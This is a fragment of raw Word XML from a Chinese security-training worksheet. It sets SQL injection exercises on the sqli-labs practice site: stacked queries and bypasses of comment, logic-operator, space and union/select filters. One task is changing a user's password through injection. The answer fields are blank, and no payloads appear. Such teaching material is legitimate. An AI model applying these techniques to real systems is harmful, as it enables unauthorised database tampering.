              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33F0" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33F1" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33F2" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33F3" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="13"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C33F4" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C33F6" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C33F7" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc26652"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆叠查询注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33F9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33F8" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33FB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33FA" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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</w:rPr>
              <w:t>堆叠查询注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33FD" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C33FC" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C33FF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C33FE" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握堆叠查询的利用方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3401" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3400" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3405" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3402" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-38/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3403" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:num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将</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Angelina</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户的密码修改为自己姓名的拼音</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3404" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:num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查看修改之后的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Angelina</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3407" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3406" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C340E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3408" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3409" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C340A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C340B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C340C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C340D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C340F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3410" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc18070"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过注释过滤注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3412" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3411" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3414" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3413" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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绕过注释过滤注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3416" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3415" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3418" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3417" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>学员能够掌握</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>绕过注释过滤</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C341A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3419" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C341D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C341B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-23/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C341C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:num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绕过该链接的限制，执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C341F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C341E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3426" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3420" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3421" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3422" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3423" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3424" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3425" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3427" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3428" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc22901"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过逻辑运算过滤注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C342A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3429" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C342C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C342B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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绕过逻辑运算过滤注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C342E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C342D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3430" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C342F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>绕过逻辑运算过滤的注入方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3432" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3431" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3435" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3433" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-25/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3434" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:num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绕过该链接的限制，执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3437" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3436" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C343E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3438" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3439" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C343A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C343B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C343C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C343D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C343F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3440" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc5218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>绕过空格过滤注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3442" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3441" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3444" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3443" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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绕过空格过滤注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3446" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3445" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3448" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3447" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握绕过空格过滤的注入方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C344A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3449" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C344D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C344B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:num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目标链接：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/sqli-labs/Less-26b/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C344C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>
              </w:num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绕过该链接的限制，执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C344F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C344E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3456" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3450" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3451" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3452" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3453" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3454" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3455" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3457" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3458" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc19885"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:t>union</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C345A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3459" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C345C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C345B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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</w:rPr>
              <w:t>绕过</w:t>
            </w:r>
            <w:r>
              <w:t>union</w:t>
            </w:r>
            <w:r>
              <w:t>和</w:t>
            </w:r>
            <w:r>
              <w:t>select</w:t>
            </w:r>
            <w:r>
